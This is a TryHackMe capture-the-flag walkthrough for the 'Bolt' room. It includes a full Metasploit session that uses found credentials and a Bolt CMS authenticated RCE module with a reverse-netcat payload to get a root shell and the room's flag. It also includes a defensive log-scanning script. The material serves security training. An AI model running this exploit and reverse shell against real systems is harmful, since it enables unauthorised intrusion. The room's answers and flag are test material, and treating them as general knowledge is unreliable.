Tryhackme - Bolt

In this walkthrough, we will be going through the Bolt room from Tryhackme. This room covers the exploitation of the Bolt CMS through an authenticated Remote Code Execution exploit. The room expects basic enumeration skills and familiarity with an exploitation framework such as Metasploit. So, let’s get started.

Bolt - Introduction

Machine Info:

Title: Bolt
IP address: 10.10.236.41
Difficulty: Easy
Objective: This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. You should wait for at least 3-4 minutes for the machine to start properly.

Task 1 – Deploy the machine

Task 2 – Hack your way into the machine!

Question 1 – What port number has a web server with a CMS running?

  • We start with a regular nmap scan, specifying the flags for a half-open SYN scan (-sS) and service/version detection (-sV).

wh1terose@fsociety:~$ nmap -sS -sV 10.10.236.41

Host is up (0.24s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open     http    (PHP 7.2.32-1)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.45 seconds

nmap scan

8000

Question 2 – What is the username we can find in the CMS?

  • Explore the web application on port 8000.

Bolt CMS username

bolt

Question 3 – What is the password we can find for the username?

  • Navigating to the following URL reveals the password for the user bolt.
http://<Machine IP>:8000/entry/message-for-it-department

Bolt username password
boltadmin123

Question 4 – What version of the CMS is installed on the server? (Ex: Name 1.1.1)

  • Navigating to the following URL reveals the login page of the Bolt CMS. Logging in to the dashboard with the credentials found earlier reveals the version of the CMS at the bottom of the page.
http://<Machine IP>:8000/bolt/login

Bolt CMS login page

Bolt version

Bolt 3.7.1

Question 5 – There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?

  • Google the Bolt version 3.7.1 for known exploits. You will find an Exploit DB entry describing an Authenticated Remote Code Execution exploit for Bolt 3.7.0.

Bolt Authenticated RCE

48296

Question 6 – Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit

Done

Question 7 – Look for flag.txt inside the machine.

  • Use the Metasploit module bolt_authenticated_rce to obtain a root shell, then read the flag to complete the room.

msf6 > use exploit/unix/webapp/bolt_authenticated_rce
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(unix/webapp/bolt_authenticated_rce) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
    0   Linux (x86)
    1   Linux (x64)
=>  2   Linux (cmd)


msf6 exploit(unix/webapp/bolt_authenticated_rce) > show options

Module options (exploit/unix/webapp/bolt_authenticated_rce):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Traversal path from "/files" on the web server to "/root" on the server
   PASSWORD                                    yes       Password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                8000                   yes       The target port (TCP)
   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /                      yes       Base path to Bolt CMS
   URIPATH                                     no        The URI to use for this exploit (default is random)
   USERNAME                                    yes       Username to authenticate with
   VHOST                                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all ad
                                       dresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Linux (cmd)



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/bolt_authenticated_rce) > set LHOST 10.18.11.103
LHOST => 10.18.11.103
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set USERNAME bolt
USERNAME => bolt
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set password boltadmin123
password => boltadmin123
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set RHOSTS 10.10.236.41 
RHOSTS => 10.10.236.41
msf6 exploit(unix/webapp/bolt_authenticated_rce) > exploit

[*] Started reverse TCP handler on 10.18.11.103:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "jnayvn".
[*] Found 3 potential token(s) for creating .php files.
[+] Used token 0f1630df2cf71d71dbdd805609 to create ncwepzlb.php.
[*] Attempting to execute the payload via "/files/ncwepzlb.php?jnayvn=`payload`"
[!] No response, may have executed a blocking payload!
[*] Command shell session 1 opened (10.18.11.103:4444 -> 10.10.236.41:58902) at 2023-05-12 22:01:49 +0530
[+] Deleted file ncwepzlb.php.
[+] Reverted user profile back to original state.

id
uid=0(root) gid=0(root) groups=0(root)
ls      
index.html
cd /root
ls
cd /home
ls
bolt
composer-setup.php
flag.txt
cat flag.txt
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

Msfconsole targets

Msfconsole options

Got the flag
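A defender-side companion to the trace above, added here and not part of the room or of the Metasploit module: it scans Apache access-log lines for PHP files requested under Bolt's /files upload directory and notes whether the same client edited its Bolt profile shortly before, which are the two steps visible in the module output. The log lines and the client IP 192.0.2.7 are constructed.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed Apache combined-format log lines (not from the room). Lines 2 and 3
# mirror the sequence in the msfconsole trace: a profile edit, then a request for a
# freshly created .php file under /files with a random query parameter.
SAMPLE_LOG = """\
10.18.11.103 - - [12/May/2023:22:01:40 +0530] "GET /bolt/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.18.11.103 - - [12/May/2023:22:01:45 +0530] "POST /bolt/profile HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.18.11.103 - - [12/May/2023:22:01:49 +0530] "GET /files/ncwepzlb.php?jnayvn=id HTTP/1.1" 200 31 "-" "Mozilla/5.0"
192.0.2.7 - - [12/May/2023:22:03:10 +0530] "GET /files/logo.png HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.0.2.7 - - [12/May/2023:22:04:00 +0530] "GET /files/report.php HTTP/1.1" 404 196 "-" "curl/7.68.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# /files is Bolt's upload directory; a request for a PHP-family file there is never legitimate.
UPLOAD_PHP_RE = re.compile(r'^/files/[^?]*\.ph(?:p\d?|tml|ar)(?:\?|$)', re.IGNORECASE)
PROFILE_PATH = "/bolt/profile"


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")


def find_upload_dir_php_requests(log_text: str, window: timedelta = timedelta(minutes=5)) -> List[Dict]:
    """One finding per request that executes PHP under /files. Each finding records whether the
    same client modified its Bolt profile within `window` beforehand (the write primitive the
    module output above relies on) and whether the server actually served the file (status 200)."""
    last_profile_edit: Dict[str, datetime] = {}
    findings: List[Dict] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, path = m.group("ip"), parse_ts(m.group("ts")), m.group("path")
        if m.group("method") == "POST" and path.startswith(PROFILE_PATH):
            last_profile_edit[ip] = when
            continue
        if UPLOAD_PHP_RE.match(path):
            prior = last_profile_edit.get(ip)
            findings.append({
                "ip": ip,
                "path": path,
                "served": m.group("status") == "200",
                "profile_edit_before": prior is not None and when - prior <= window,
            })
    return findings


if __name__ == "__main__":
    for finding in find_upload_dir_php_requests(SAMPLE_LOG):
        print(finding)
```

A served hit with a preceding profile edit is the strongest signal; a 404 without one is more likely a scanner probing for webshells, but both mean the upload directory should not be executing PHP at all.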


Conclusion:

So that was it. We just completed the “Bolt” room. Let’s summarize it quickly. First, we started with our usual nmap scan, which found a web server on port 8000 running the Bolt CMS. Exploring the web app revealed the username and password for the backend. Logging in with those credentials gave us the version of the CMS running. Googling the version for known public exploits revealed an authenticated RCE for version 3.7.0. Using the corresponding Metasploit module gave us a root shell and the final flag for the room.
